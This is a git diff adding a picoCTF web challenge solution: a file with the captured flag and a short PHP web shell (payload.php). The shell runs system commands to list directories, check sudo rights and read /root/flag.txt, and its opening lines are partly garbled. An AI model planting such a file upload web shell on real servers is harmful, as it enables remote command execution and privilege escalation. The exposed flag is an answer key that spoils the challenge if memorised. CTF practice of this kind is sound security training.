diff --git a/web/n0s4n1ty_1/flag.txt b/web/n0s4n1ty_1/flag.txt new file mode 100644 index 0000000..073da0a --- /dev/null +++ b/web/n0s4n1ty_1/flag.txt @@ -0,0 +1 @@ +picoCTF{wh47_c4n_u_d0_wPHP_5fd11be6} diff --git a/web/n0s4n1ty_1/payload.php b/web/n0s4n1ty_1/payload.php new file mode 100644 index 0000000..07730ec --- /dev/null +++ b/web/n0s4n1ty_1/payload.php @@ -0,0 +1,17 @@ +"; + echo nl2br(system('ls -lah /')); + echo "

"; + + echo "sudo rights:
"; + echo nl2br(system('sudo -l')); + echo "

"; + + echo "'/root' listing:
"; + echo nl2br(system('sudo ls -lah /root')); + echo "

"; + + echo "'/root/flag.txt' contents:
"; + echo nl2br(system('sudo cat /root/flag.txt')); + echo "

"; +?>